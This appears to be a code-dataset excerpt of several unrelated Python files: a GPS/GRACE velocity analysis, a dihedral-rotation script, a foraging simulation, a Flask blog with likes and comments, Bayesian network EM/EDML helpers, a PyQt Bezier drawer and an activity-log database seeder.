            print("Kicking station %s out..." % dataobj_list[i].name);
            [east_slope_after, north_slope_after, vert_slope_after] = [np.nan, np.nan, np.nan];
            [east_slope_before, north_slope_before, vert_slope_before] = [np.nan, np.nan, np.nan];
            [east_slope_unc1, north_slope_unc1, vert_slope_unc1] = [np.nan, np.nan, np.nan];
            [east_slope_unc2, north_slope_unc2, vert_slope_unc2] = [np.nan, np.nan, np.nan];
        east_slope_obj.append([east_slope_before, east_slope_after, east_dv_unc]);
        north_slope_obj.append([north_slope_before, north_slope_after, north_dv_unc]);
        vert_slope_obj.append([vert_slope_before, vert_slope_after, vert_dv_unc]);
    # Adjusting verticals by a reference station.
    vert_slope_obj = vert_adjust_by_reference_stations(names, coords, vert_slope_obj);
    return [noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj];
def vert_adjust_by_reference_stations(names, coords, slope_obj):
    # How do we adjust the verticals for large-scale drought signatures?
    # Subtract the mean before/after vertical rate of a set of background
    # reference stations (selected by radius annulus, coordinate box, or
    # a single named station) from every station's vertical rates.
    reference_station = 'P208';
    coord_box = [-123, -121, 39, 42];
    eq_coords = [-124.81, 40.53];
    radius = 250;
    max_radius = 350;
    reference_type = 'radius'  # options = 'radius','box','station'
    new_slope_obj = [];
    background_slopes_before = [];
    background_slopes_after = [];
    for i in range(len(names)):
        if reference_type == 'station':
            if names[i] == reference_station:
                background_slopes_before.append(slope_obj[i][0]);
                background_slopes_after.append(slope_obj[i][1]);
        elif reference_type == 'box':
            if coord_box[0] < coords[i][0] < coord_box[1]:
                if coord_box[2] < coords[i][1] < coord_box[3]:
                    background_slopes_before.append(slope_obj[i][0]);
                    background_slopes_after.append(slope_obj[i][1]);
        elif reference_type == 'radius':
            # Coordinates are swapped to [lat, lon] here -- presumably
            # haversine.distance expects that order; confirm upstream.
            mydistance = haversine.distance([coords[i][1], coords[i][0]], [eq_coords[1], eq_coords[0]]);
            if radius < mydistance < max_radius:
                background_slopes_before.append(slope_obj[i][0]);
                background_slopes_after.append(slope_obj[i][1]);
    vert_reference_before = np.nanmean(background_slopes_before);
    vert_reference_after = np.nanmean(background_slopes_after);
    print("Vert slope before: %f " % vert_reference_before);
    print("Vert slope after: %f " % vert_reference_after);
    for i in range(len(slope_obj)):
        new_slope_obj.append(
            [slope_obj[i][0] - vert_reference_before, slope_obj[i][1] - vert_reference_after, slope_obj[i][2]]);
    return new_slope_obj;
def outputs(noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj, outdir, expname, fit_type, network, refframe,
            deltat1, deltat2, time_after_start_date, critical_variance):
    """Write the velocity-change table and call the shell plotting script."""
    basename = outdir + '/' + expname;
    ofile1 = open(basename + '.txt', 'w');
    ofile1.write("# %s network in %s refframe with %s seasonal removal\n" % (network, refframe, fit_type));
    ofile1.write("# %d days gap after EQtime, %s mm/yr maximum variance\n" % (time_after_start_date, critical_variance))
    ofile1.write("# %s minus %s velocities \n" % (deltat2, deltat1));
    for i in range(len(noeq_objects)):
        # Lon, Lat, East, North, 0, Vert, SigE, SigN, SigV, Corr, Name
        ofile1.write("%.2f %.2f %.2f %.2f 0 %.2f %.2f %.2f %.2f 0 %s\n" % (
            noeq_objects[i].coords[0], noeq_objects[i].coords[1], east_slope_obj[i][1] - east_slope_obj[i][0],
            (north_slope_obj[i][1] - north_slope_obj[i][0]), vert_slope_obj[i][1] - vert_slope_obj[i][0],
            east_slope_obj[i][2], north_slope_obj[i][2], vert_slope_obj[i][2], noeq_objects[i].name));
    ofile1.close();
    # Here we call the GMT master script, if we want.
    subprocess.call("./master_plotting.sh " + outdir + "/ " + expname, shell=True);
    return;
# ---------------------- #
# GRACE ONLY FUNCTIONS #
# Sometimes we want to see whether loading from GRACE is able to explain the
# data from Mendocino, etc.
def grace_driver(deltat1, deltat2, grace_dir, outfile_name, out_dir):
    # For when you want to do the same calculations, for GRACE models:
    # configure -> read model time series -> fit window velocities ->
    # write the table of velocity changes.
    [file_list, dt1_start, dt1_end, dt2_start, dt2_end, basename] = grace_configure(deltat1, deltat2, grace_dir,
                                                                                    outfile_name);
    [dataobj_list] = grace_inputs(file_list);
    [east_slope_obj, north_slope_obj, vert_slope_obj] = grace_compute(dt1_start, dt1_end, dt2_start, dt2_end,
                                                                      dataobj_list);
    grace_outputs(dataobj_list, east_slope_obj, north_slope_obj, vert_slope_obj, out_dir, basename);
    return;
def grace_configure(deltat1, deltat2, grace_dir, outfile_name):
    """Parse the two (start, end) YYYYMMDD interval strings and list the
    GRACE .txt files in grace_dir.

    Returns [file_list, dt1_start, dt1_end, dt2_start, dt2_end, basename].
    """
    def _parse(stamp):
        return dt.datetime.strptime(stamp, "%Y%m%d")

    dt1_start, dt1_end = _parse(deltat1[0]), _parse(deltat1[1])
    dt2_start, dt2_end = _parse(deltat2[0]), _parse(deltat2[1])
    file_list = glob.glob(grace_dir + "/*.txt")
    print("Reading %d files in %s " % (len(file_list), grace_dir))
    return [file_list, dt1_start, dt1_end, dt2_start, dt2_end, outfile_name]
def grace_inputs(file_list):
    """Read each GRACE loading-model file into a time-series object."""
    return [[gps_io_functions.read_grace(path) for path in file_list]]
def grace_compute(dt1_start, dt1_end, dt2_start, dt2_end, dataobject_list):
    """Fit a best-fit line velocity in each of the two windows for every
    GRACE series; returns before/after pairs for east, north, vertical."""
    east_slope_obj = [];
    north_slope_obj = [];
    vert_slope_obj = [];
    period_after_start_date = 7;  # wait a week.
    for i in range(len(dataobject_list)):
        # Just fit the best line.
        # # Get the pre-event and post-event velocities
        [east_slope_before, north_slope_before, vert_slope_before, esig0, nsig0, usig0] = gps_ts_functions.get_slope(
            dataobject_list[i], starttime=dt1_start + dt.timedelta(days=period_after_start_date), endtime=dt1_end);
        [east_slope_after, north_slope_after, vert_slope_after, esig1, nsig1, usig1] = gps_ts_functions.get_slope(
            dataobject_list[i], starttime=dt2_start + dt.timedelta(days=period_after_start_date), endtime=dt2_end);
        east_slope_obj.append([east_slope_before, east_slope_after]);
        north_slope_obj.append([north_slope_before, north_slope_after]);
        vert_slope_obj.append([vert_slope_before, vert_slope_after]);
        # # Experiment: Remove the sinusoidal components. Result is identical.
        # [east_params_before, north_params_before, vert_params_before] = grace_ts_functions.get_linear_annual_semiannual(dataobject_list[i], starttime=dt1_start+dt.timedelta(days=period_after_start_date),endtime=dt1_end);
        # [east_params_after, north_params_after, vert_params_after]=grace_ts_functions.get_linear_annual_semiannual(dataobject_list[i],starttime=dt2_start+dt.timedelta(days=period_after_start_date),endtime=dt2_end);
        # east_slope_obj.append([east_params_before[0], east_params_after[0]]);
        # north_slope_obj.append([north_params_before[0], north_params_after[0]]);
        # vert_slope_obj.append([vert_params_before[0], vert_params_after[0]]);
    return [east_slope_obj, north_slope_obj, vert_slope_obj];
def grace_outputs(dataobj_list, east_slope_obj, north_slope_obj, vert_slope_obj, out_dir, basename):
    """Write the GRACE velocity-change table (same column layout as
    outputs(), with zeroed uncertainty columns)."""
    ofile1 = open(out_dir + basename + '.txt', 'w');
    for i in range(len(dataobj_list)):
        ofile1.write("%f %f %f %f 0 %f 0 0 0 0 %s\n" % (
            dataobj_list[i].coords[0], dataobj_list[i].coords[1], east_slope_obj[i][1] - east_slope_obj[i][0],
            (north_slope_obj[i][1] - north_slope_obj[i][0]), vert_slope_obj[i][1] - vert_slope_obj[i][0],
            dataobj_list[i].name));
    ofile1.close();
    # subprocess.call(['./accel_map_gps.gmt',basename+'.txt',str(map_coords[0]),str(map_coords[1]),str(map_coords[2]),str(map_coords[3]),basename],shell=False);
    # print('./accel_map_gps.gmt '+str(map_coords[0])+' '+str(map_coords[1])+' '+str(map_coords[2])+' '+str(map_coords[3])+' '+basename);
    return;
|
996,629 | d2a8fae8f451b4e16ee721bd70900ea4872d341a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
########################################################################
#
# Script to rotate a dihedral angle in a molecule
#
#########################################################################
import ff_gen.IOmod as IOmod
import molsys.stow as stow
import chemcoord as cc
import numpy
# Command-line options: -i xyz file, -b atom IDs defining the dihedral,
# -s/-e start/end angle, -d angular step.
option = [
    ['', 'i', 'xyzfile'],
    ['', 'b', 'bond'],  # IDs of the 4 atoms which define the dihedral angle. Format: "a0 a1 a2 a3" (with " or ' signs)
    ['0', 's', 'start_angle'],
    ['180', 'e', 'end_angle'],
    ['5', 'd', 'step']]
shellval = stow.main(stow.sys.argv[1:], option)
fname = shellval[0]
bond = shellval[1]
start = shellval[2]
end = shellval[3]
step = shellval[4]
# Convert the CLI strings into numeric values.
bond_list = [int(i) for i in bond.split()]
start = float(start)
end = float(end)
step = float(step)
l = numpy.arange(start, end, step)
# Re-read the input geometry for each target angle, rotate the dihedral,
# and write one xyz file per angle (filename is prefixed with the angle,
# truncated to an integer by %d).
for i in l:
    kaskel = IOmod.io()
    kaskel.read_xyz(fname)
    kaskel.rotate_dihedral(bond_list, i)
    kaskel.write_xyz('%d%s' % (i, fname))
|
996,630 | 1ed67b19ff7a0f17feac3bea0b7a9e25a79a4c99 | from environment import World
from creature import Cell
from random import randint, choice
def main():
    """Run a toy foraging simulation: creatures wander a 10x10 world
    eating nutrients until no creature wants to move, for 10 rounds.

    NOTE(review): indentation in the original source was lost; nesting
    below is reconstructed from control flow -- verify against the
    original file.
    """
    env = World(10, 10)
    creatures = list()
    env.replenish(20)
    env.display()
    num_creatures = 10
    for i in range(0, num_creatures):
        x, y = env.random_location()
        creatures.append(Cell(x, y))
        print(creatures[i])
    total_rounds = 10
    iterations = 0
    for i in range(0, total_rounds):
        creatures_can_move = True
        # Hard cap on iterations guards against livelock.
        while(creatures_can_move and iterations < 1000000):
            for creature_i in range(0, len(creatures)):
                creature = creatures[creature_i]
                if creature.will_move():
                    possible_moves = {"left", "right", "up", "down"}
                    # Try random directions until one is valid or all fail.
                    while(len(possible_moves) and not creature.satisfied):
                        direction = choice(tuple(possible_moves))
                        xpos, ypos = creature.pos_with_move(direction)
                        if env.valid_spot(xpos, ypos):
                            print(f'Moving: {creature_i} ({creature.moves_this_turn})')
                            creature.move(direction)
                            if env.board[creature.x][creature.y].total_nutrients() > 0:
                                creature.eat(env.board[creature.x][creature.y].consume().nutrients)
                                creature.satisfied = True  # Conditions for satisfaction will change
                            break
                        possible_moves.remove(direction)
                    iterations += 1
            # Continue this round if any creature can continue to move
            creatures_can_move = False
            for creature_i in range(0, len(creatures)):
                creature = creatures[creature_i]
                if creature.will_move():
                    # print(f'Creature: {creature_i} still wants to move after doing {creature.moves_this_turn} moves')
                    creatures_can_move = True
        print("Round ended")
        env.display()
        for creature in creatures:
            print(creature)
            creature.return_home()


if __name__ == "__main__":
    main()
|
996,631 | 446f10b33142cd84c1384efa89e899efbd0b9b13 | from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for
)
from werkzeug.exceptions import abort
from flaskr.auth import login_required
from flaskr.db import get_db
bp = Blueprint('blog', __name__)
@bp.route('/', methods=['GET', 'POST'])
def index():
    """List all posts, newest first, with per-post like and comment
    counts (likes_list/comments_list are parallel to posts)."""
    db = get_db()
    posts = db.execute(
        'SELECT p.id, title, body, created, author_id, username'
        ' FROM post p JOIN user u ON p.author_id = u.id'
        ' ORDER BY created DESC'
    ).fetchall()
    """ Get likes total """
    likes_list = []
    comments_list = []
    for post in posts:
        # Count only rows flagged is_like=1 (a like that was toggled off
        # remains as a row with is_like=0).
        likes = db.execute(
            'SELECT id, post_id, is_like FROM likes WHERE post_id=? and is_like=1', (post['id'],)
        ).fetchall()
        likes_list.append(len(likes))
        comments = db.execute(
            'SELECT id FROM comments WHERE post_id=?', (post['id'],)
        ).fetchall()
        comments_list.append(len(comments))
    data = {
        'posts': posts,
        'likes_list': likes_list,
        'comments_list': comments_list,
    }
    return render_template('blog/index.html', posts=posts, data=data)
@bp.route('/create', methods=('GET', 'POST'))
@login_required
def create():
    """Create a post authored by the logged-in user; re-renders the form
    with a flashed message when the title is missing."""
    if request.method == 'POST':
        title = request.form['title']
        body = request.form['body']
        error = None
        if not title:
            error = 'Title is required.'
        if error is not None:
            flash(error)
        else:
            db = get_db()
            db.execute(
                'INSERT INTO post (title, body, author_id)'
                ' VALUES (?, ?, ?)',
                (title, body, g.user['id'])
            )
            db.commit()
            return redirect(url_for('blog.index'))
    return render_template('blog/create.html')
@bp.route('/<int:id>/update', methods=('GET', 'POST'))
@login_required
def update(id):
    """Edit an existing post; get_post() enforces existence (404) and
    authorship (403) before anything else happens."""
    post = get_post(id)
    if request.method == 'POST':
        title = request.form['title']
        body = request.form['body']
        error = None
        if not title:
            error = 'Title is required.'
        if error is not None:
            flash(error)
        else:
            db = get_db()
            db.execute(
                'UPDATE post SET title = ?, body = ?'
                ' WHERE id = ?',
                (title, body, id)
            )
            db.commit()
            return redirect(url_for('blog.index'))
    return render_template('blog/update.html', post=post)
@bp.route('/<int:id>/delete', methods=('POST',))
@login_required
def delete(id):
    """Delete a post; get_post() enforces existence and authorship first."""
    get_post(id)
    database = get_db()
    database.execute('DELETE FROM post WHERE id = ?', (id,))
    database.commit()
    return redirect(url_for('blog.index'))
@bp.route('/<int:id>/post', methods=('GET', 'POST'))
def post_detail(id):
    """Public post page: shows a post with its likes and comments, and
    accepts new visitor comments via POST.

    Bug fix: the comment INSERT previously executed even when validation
    failed (missing name or comment) -- the flash() branch fell through
    to db.execute().  The insert/commit now only runs when there is no
    validation error.
    """
    post = get_post_detail(id)
    db = get_db()
    if request.method == 'POST':
        visitor = request.form['name']
        comment = request.form['comment']
        error = None
        if not visitor:
            error = 'Your name is required.'
        if not comment:
            error = 'Comment is required.'
        if error is not None:
            flash(error)
        else:
            db.execute(
                'INSERT INTO comments (post_id, visitor, comment)'
                ' VALUES (?, ?, ?)',
                (id, visitor, comment)
            )
            db.commit()
    # Resolve the current user's like state, if anyone is logged in.
    is_like = False
    if g.user:
        like_detail = get_likes_detail(post['id'], g.user['id'])
        if like_detail:
            is_like = like_detail['is_like']
        else:
            is_like = False
    likes_count = get_likes_count(id)
    # Load comments for display.
    comments = db.execute(
        'SELECT id, created, post_id, visitor, comment'
        ' FROM comments WHERE post_id = ?', (id,)
    ).fetchall()
    comment_count = 0
    if comments:
        comment_count = len(comments)
    data = {
        'likes_count': likes_count,
        'is_like': is_like,
        'post': post,
        'comments': comments,
        'comment_count': comment_count,
    }
    return render_template('blog/post_detail.html', data=data)
@bp.route('/<int:post_id>/like')
@login_required
def like_this_post(post_id):
    """Toggle the current user's like on a post.

    First like inserts a row with is_like=True; subsequent clicks flip
    the existing row's is_like flag instead of inserting another row.
    """
    if g.user['id']:
        is_like = True
        like_detail = get_likes_detail(post_id, g.user['id'])
        if not like_detail:
            db = get_db()
            db.execute(
                'INSERT INTO likes (post_id, user_id, is_like)'
                ' VALUES (?, ?, ?)',
                (post_id, g.user['id'], is_like)
            )
            db.commit()
        else:
            # Invert the stored flag.
            is_like = like_detail['is_like']
            if not is_like:
                is_like = True
            else:
                is_like = False
            db = get_db()
            db.execute(
                'UPDATE likes SET is_like = ?'
                ' WHERE id = ?',
                (is_like, like_detail['id'])
            )
            db.commit()
    return redirect(url_for('blog.post_detail', id=post_id))
def get_post(id, check_author=True):
    """Fetch a post (joined with its author's username) by id.

    Aborts 404 if the post does not exist; with check_author=True also
    aborts 403 unless the current user wrote the post.
    """
    post = get_db().execute(
        'SELECT p.id, title, body, created, author_id, username'
        ' FROM post p JOIN user u ON p.author_id = u.id'
        ' WHERE p.id = ?',
        (id,)
    ).fetchone()
    if post is None:
        abort(404, "Post id {0} doesn't exist.".format(id))
    if check_author and post['author_id'] != g.user['id']:
        abort(403)
    return post
def get_post_detail(id):
    """Fetch a post by id for public display (no authorship check).

    Delegates to get_post with check_author=False: the query and the
    404 handling were duplicated verbatim, so keep them in one place.
    """
    return get_post(id, check_author=False)
def get_likes_detail(post_id, user_id):
    """Return the likes row for (post_id, user_id), or None if absent."""
    query = (
        'SELECT id, post_id, user_id, is_like FROM likes'
        ' WHERE post_id = ? and user_id = ?'
    )
    return get_db().execute(query, (post_id, user_id)).fetchone()
def get_likes_count(post_id):
    """Count rows for this post whose is_like flag is truthy."""
    rows = get_db().execute(
        'SELECT id, is_like FROM likes WHERE post_id = ?', (post_id,)
    )
    return sum(1 for row in rows if row['is_like'])
|
996,632 | 49ca55fbdfc7fea819956c3510d49654bbb5078d | from parser import *
from matrix import *
# Script entry: build a blank screen and identity transform, then execute
# the drawing commands in 'script2' (parse_file presumably mutates
# edges/transform/screen in place -- defined in the local parser module).
screen = new_screen()
color = [0, 0, 0]
edges = []
transform = new_matrix()
parse_file('script2', edges, transform, screen, color)
|
996,633 | 53cb967d01fbaf4ff31ac55641fd7ebd5ed36f53 | from django.shortcuts import render
from django.http import HttpResponse
from appTwo.models import User
# Create your views here.
def index(request):
    """Render the appTwo landing page (no context data)."""
    return render(request, 'appTwo/index.html', context={})
def users(request):
    """List all User rows ordered by first name."""
    users_list = User.objects.order_by('first_name')
    users_dict = {'users_info': users_list}
    return render(request, 'appTwo/users.html', context=users_dict)
|
996,634 | cc24cf26e1006c4ea0b3381237a701b978fd8f12 | #!/usr/bin/env jython
import arthur.Data as Data
import arthur.EmUtil as Util
import arthur.EDML as EDML
import arthur.ExpectationMaximizationMap as EM
import arthur.ExpectationMaximizationMapAlt as EMALT
import il2.model.BayesianNetwork as BN
import il2.model.Domain as Domain
import il2.model.Table as Table
import il2.util.IntSet as IntSet
import java.util.Random as Random
def parent_set_iterator(ordering):
    # Enumerate all 2^n subsets of `ordering` by treating the loop index
    # as a bitmask over positions.  (xrange / integer '/': this file
    # targets Jython / Python 2.)
    for ind in xrange(2**len(ordering)):
        yield [ parent for i,parent in enumerate(ordering) if (ind/2**i)%2 ]
def structure_iterator(ordering):
    """Yield every network structure consistent with the variable ordering.

    A structure maps each variable to a list of parents drawn from the
    variables preceding it in `ordering`.  Each yielded dict is a fresh
    copy: the original implementation yielded one shared dict that it
    kept mutating, so callers that collected the results (e.g. into a
    list) saw aliased, clobbered structures.
    """
    if len(ordering) == 1:
        var = ordering[0]
        yield { var:[] }
    else:
        var = ordering[-1]
        ordering_m1 = ordering[:-1]
        for structure in structure_iterator(ordering_m1):
            for parents in parent_set_iterator(ordering_m1):
                new_structure = dict(structure)
                new_structure[var] = parents
                yield new_structure
def permutation_iterator(iterable, r=None):
    """Yield the r-length permutations of `iterable` as tuples.

    The original body was the pure-Python recipe from the itertools
    documentation, which exactly reproduces itertools.permutations
    (r=None means full length; r > n yields nothing).  Delegate to the
    C implementation instead.
    """
    import itertools
    for perm in itertools.permutations(iterable, r):
        yield perm
def make_skeleton_bn(domain,ordering,families):
    # Build a BayesianNetwork whose CPTs cover the right variables
    # (each var plus its parents from `families`) but carry no learned
    # parameter values yet.
    cpts = []
    for var in ordering:
        parents = families[var]
        parents = [ domain.index(parent) for parent in parents ]
        parents.sort()
        cpt_vars = IntSet(parents + [domain.index(var)])
        cpt = Table(domain,cpt_vars)
        cpts.append(cpt)
    return BN(cpts)
def size_of_bn(bn):
    # Count free parameters: each CPT contributes (|var|-1) parameters
    # per parent configuration (integer '/': Jython / Python 2).
    domain = bn.domain()
    size = 0
    for var,cpt in enumerate(bn.cpts()):
        var_size = domain.size(var)
        cpt_size = len(cpt.values())
        cpt_size = (var_size-1)*(cpt_size/var_size)
        size += cpt_size
    return size
def random_network(bn,seed=0):
    # Return a copy of bn with randomly initialized parameters; the
    # default fixed seed makes runs reproducible.
    r = Random(seed)
    return BN(Util.randomNetwork(bn,r))
def run_em(bn,data,counts=None,seed=None,iters=1024,eps=1e-4,psi=1,stats=None):
    """Learn MAP parameters for `bn` from `data` via EM; returns the
    learned BayesianNetwork and populates `stats` in place.

    Bug fix: `stats` previously defaulted to a shared mutable dict
    ({} in the signature), so calls relying on the default all wrote
    into the same object.  It now defaults to a fresh dict per call;
    callers that pass their own dict are unaffected.
    """
    if stats is None:
        stats = {}
    em = EM(bn,data,counts)
    em.setEmParameters(iters,eps)
    em.setPrior(psi)
    if seed is None: seed = random_network(bn,0)
    cpts = em.em(seed.cpts())
    log_likelihood,log_prior,score = em.logmap,0.0,0.0
    #log_likelihood = Util.logLikelihood(cpts,data,counts)
    #log_prior = Util.logPrior(cpts,em.prior)
    #score = log_likelihood + log_prior
    stats['log_map'] = score
    stats['log_likelihood'] = log_likelihood
    stats['log_prior'] = log_prior
    stats['iterations'] = em.iterations
    stats['residual'] = em.residual
    stats['map_residual'] = em.map_residual
    stats['learn_time'] = em.learn_time
    return BN(cpts)
def run_edml(bn,data,counts=None,seed=None,
             iters=1024,eps=1e-4,psi=1,stats=None):
    """Learn parameters for `bn` via EDML; returns the learned
    BayesianNetwork and populates `stats` in place.

    Bug fix: `stats` previously defaulted to a shared mutable dict
    ({} in the signature); it now defaults to a fresh dict per call.
    Callers that pass their own dict are unaffected.
    """
    if stats is None:
        stats = {}
    ed = EDML(bn,data,counts)
    ed.setEdParameters(iters,eps,0.5)
    ed.setPrior(psi)
    if seed is None: seed = random_network(bn,0)
    cpts = ed.compensate(seed.cpts())
    log_likelihood,log_prior,score = ed.logmap,0.0,0.0
    #log_likelihood = Util.logLikelihood(cpts,data,counts)
    #log_prior = Util.logPrior(cpts,ed.prior)
    #score = log_likelihood + log_prior
    stats['log_map'] = score
    stats['log_likelihood'] = log_likelihood
    stats['log_prior'] = log_prior
    stats['iterations'] = ed.iterations
    stats['residual'] = ed.residual
    stats['learn_time'] = ed.learn_time
    return BN(cpts)
|
996,635 | f0c7521041c79ec8d5d6d121f3f7c020088cc182 | list = [3, 7, -2, 12]
max(list) - min(list) |
996,636 | 509bfa243b6fb7dc44ea01d3d37edde414891a9c | """
Draw bezier curve for a given set of points using the recursive de Castlejau algorithm. Implemented
using PyQt4
"""
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
INT_MAX = 100000
NEARNESS_THRESHOLD = 10
NUM_T_VALUES = 2000
class BezierWindow(QWidget):
    """Interactive widget for drawing a Bezier curve from user-placed points.

    Mouse: left click adds a control point, right click removes the nearest
    point, middle click selects and then repositions a point.
    Keys: C clears the screen, U cancels a pending move, D draws the Bezier
    curve, R redraws the control polygon.
    """
    def __init__(self, t_values=100):
        super(BezierWindow, self).__init__()
        self.points = []            # control points, in insertion order
        # NOTE(review): drawBezier samples NUM_T_VALUES parameters; this
        # attribute is currently unused but kept for interface compatibility.
        self.t_values = t_values
        self.mPixmap = QPixmap()    # cached rendering of the scene
        self.isModified = True      # True when the pixmap must be rebuilt
        self.func = (None, None)    # (draw function, kwargs) used on repaint
        self.move_index = None      # index of the point selected for a move
        self.bezier_drawn = False
        self.setGeometry(0, 0, 1024, 650)
        self.setWindowTitle('Bezier Drawings - IS F311')
        self.show()
    def get_bezier_point(self, points, t):
        '''
        For a certain value of t, get the point on the final bezier curve
        via recursive de Casteljau interpolation. Returns a QPoint object
        of the point on the bezier curve.
        '''
        values = []
        for i in range(1, len(points)):
            values.append((points[i] * t) + (points[i-1] * (1-t)))
        if len(values) == 1:
            return values[0]
        else:
            return self.get_bezier_point(values, t)
    def drawBezier(self, qp):
        '''
        Draw bezier curve on the QPainter object qp.
        '''
        if not self.bezier_drawn:
            t_values = [(i *1.0)/NUM_T_VALUES for i in range(0, NUM_T_VALUES)]
            pen = QPen(Qt.blue, 3, Qt.SolidLine)
            qp.setPen(pen)
            for t in t_values:
                bezier_point = self.get_bezier_point(self.points, t)
                qp.drawPoint(bezier_point)
            self.bezier_drawn = True
    def paintEvent(self, event):
        '''
        Function triggered on every update() call. Rebuilds the cached
        pixmap only when isModified is set, then blits it to the widget.
        '''
        if self.isModified:
            pixmap = QPixmap(self.size())
            pixmap.fill(Qt.white)
            painter = QPainter(pixmap)
            painter.drawPixmap(0, 0, self.mPixmap)
            self.drawBackground(painter)
            self.mPixmap = pixmap
            self.isModified = False
        qp = QPainter(self)
        qp.drawPixmap(0, 0, self.mPixmap)
    def drawBackground(self, qp):
        '''
        Invoke the currently scheduled draw function (self.func) on qp.
        '''
        func, kwargs = self.func
        if func is not None:
            kwargs["qp"] = qp
            func(**kwargs)
        qp.end()
    def addNode(self, qp, point, verbose=True):
        '''
        Add a new control point and draw it (plus a connecting line to the
        previous point) on qp.
        '''
        pen = QPen(Qt.red, 7, Qt.SolidLine)
        qp.setPen(pen)
        qp.drawPoint(point)
        self.points.append(point)
        if len(self.points) > 1:
            pen = QPen(Qt.black, 1, Qt.SolidLine)
            qp.setPen(pen)
            qp.drawLine(self.points[-2], self.points[-1])
        if verbose:
            print("New point added. Total points: ", len(self.points))
    def redrawNodes(self, qp):
        '''
        Plot all the control points and lines again.
        '''
        nodes = self.points
        self.points = []
        for node in nodes:
            self.addNode(qp=qp, point=node, verbose=False)
    def get_nearest_point(self, point):
        '''
        Get the index of the nearest point to the argument point, from the
        list of points in self.points. Returns -1 when no point is within
        NEARNESS_THRESHOLD (manhattan distance).
        '''
        current_minimum = INT_MAX
        current_index = -1
        for index in range(0, len(self.points)):
            node = self.points[index]
            distance = node - point
            distance = distance.manhattanLength()
            if distance < NEARNESS_THRESHOLD and distance < current_minimum:
                current_minimum = distance
                current_index = index
        return current_index
    def mousePressEvent(self, QMouseEvent):
        '''
        processing mouse events
        '''
        if QMouseEvent.button() == Qt.LeftButton:
            self.points.append(QMouseEvent.pos())
            self.mPixmap.swap(QPixmap())
            self.update()
            self.func = (self.redrawNodes, {})
            self.isModified = True
            self.bezier_drawn = False
        elif QMouseEvent.button() == Qt.RightButton:
            print("Right Button Clicked: Remove Node")
            nearest_point = self.get_nearest_point(QMouseEvent.pos())
            if nearest_point == -1:
                print("[Remove Failed] No node found near the place you've clicked.")
                return
            else:
                self.move_index = None
                self.mPixmap.swap(QPixmap())
                self.update()
                del self.points[nearest_point]
                self.func = (self.redrawNodes, {})
                self.isModified = True
                self.bezier_drawn = False
        elif QMouseEvent.button() == Qt.MiddleButton:
            print("Middle Button Clicked: Move Node")
            if self.move_index is None:
                # First middle click: select the node to move.
                nearest_point = self.get_nearest_point(QMouseEvent.pos())
                if nearest_point == -1:
                    print("[Move Failed] No node found near the place you've clicked.")
                    return
                else:
                    self.move_index = nearest_point
                    print("Move: Node selected")
            else:
                # Second middle click: drop the selected node here.
                self.points[self.move_index] = QMouseEvent.pos()
                self.mPixmap.swap(QPixmap())
                self.update()
                self.func = (self.redrawNodes, {})
                self.isModified = True
                self.move_index = None
                self.bezier_drawn = False
        else:
            print("Unidentified click (is this even possible?)")
            return
        self.update()
    def keyPressEvent(self, event):
        '''
        processing keyboard events
        '''
        user_input = event.key()
        if user_input == Qt.Key_C:
            print("Clear Screen (C)")
            self.mPixmap.swap(QPixmap())
            self.update()
            self.points = []
            self.bezier_drawn = False
        elif user_input == Qt.Key_U:
            print("Selection undone (U)")
            self.move_index = None
        elif user_input == Qt.Key_D:
            print("Draw Bezier Curve (D)")
            self.func = (self.drawBezier, {})
            self.isModified = True
            self.update()
        # BUG FIX: this was a plain `if`, so after handling C, U or D the
        # trailing else below also printed "Unidentified keyboard input.".
        elif user_input == Qt.Key_R:
            print("Refresh Screen (R)")
            self.mPixmap.swap(QPixmap())
            self.update()
            self.func = (self.redrawNodes, {})
            self.isModified = True
            self.update()
            self.bezier_drawn = False
        else:
            print("Unidentified keyboard input.")
if __name__ == '__main__':
    '''
    Driver code
    '''
    # Create the Qt application, show the interactive Bezier window, and
    # block on the event loop until the window is closed.
    app = QtGui.QApplication(sys.argv) if False else QApplication(sys.argv)  # noqa: E501 -- see note below
    ex = BezierWindow()
    sys.exit(app.exec_())
|
996,637 | 8ac19451b67b894c235d9141de592b30b4fd96f1 | from activitylog import *
from datetime import datetime
from datetime import date
def createDB():
    """Create every activity-log table in the database."""
    tables = [Person, ActivityType, Activity, MeasurementType, Measurement, Location]
    db.create_tables(tables)
def defaultActivities():
    """Seed the ActivityType table with the default activity hierarchy.

    Abstract nodes (BaseActivityType, Mindful, Aerobic, Yoga) only group
    the concrete leaf activities created beneath them.
    """
    root = ActivityType.create(name="BaseActivityType", is_abstract=True)
    mindful = ActivityType.create(name="Mindful", parent=root, is_abstract=True)
    aerobic = ActivityType.create(name="Aerobic", parent=root, is_abstract=True)
    yoga = ActivityType.create(name="Yoga", parent=mindful, is_abstract=True)
    # Concrete leaf activities; their return values were previously bound
    # to unused locals, so the bindings are dropped.
    ActivityType.create(name="UnheatedYoga", parent=yoga)
    ActivityType.create(name="HeatedYoga", parent=yoga)
    ActivityType.create(name="Meditation", parent=mindful)
    ActivityType.create(name="Running", parent=aerobic)
    ActivityType.create(name="Hiking", parent=aerobic)
    ActivityType.create(name="Walking", parent=aerobic)
def defaultPeople():
    """Insert the default Person record(s)."""
    Person.create(name="adam", first="Adam", last="Wynne", born=date(1974, 6, 2))
def defaultLocations():
    """Insert the default Location records."""
    defaults = (
        ("YogaFlowSouth", "Yoga Flow South Hills",
         "250 Mount Lebanon Boulevard, Pittsburgh, PA 15234"),
        ("HIP", "Himalayan Institute, Pittsburgh",
         "300 Beverly Rd, Pittsburgh, PA 15216"),
        ("Gilfilan", "Gilfilan Farms",
         "130 Orr Rd, Upper St Clair, PA 15241"),
        ("Home", "Home",
         "172 Topsfield Rd, Pittsburgh, PA 15241"),
    )
    for name, longname, address in defaults:
        Location.create(name=name, longname=longname, address=address)
def testEntries():
    """Placeholder for inserting sample Activity rows.

    NOTE(review): the three selects below build queries lazily and are never
    executed or used; the function currently has no observable effect beyond
    keeping sample lookup code for the commented-out insert.
    """
    adam=Person.select().where(Person.name =="adam")
    hiking=ActivityType.select().where(ActivityType.name == "Hiking")
    gilfilan=Location.select().where(Location.name == "Gilfilan")
    #Activity.create(start=datetime(2016,1,2,10,00,00), end=datetime.now(), person=adam, activityType=hiking, location=gilfilan, distance=3)
def init():
    """Create the schema, then load defaults and test data in dependency order."""
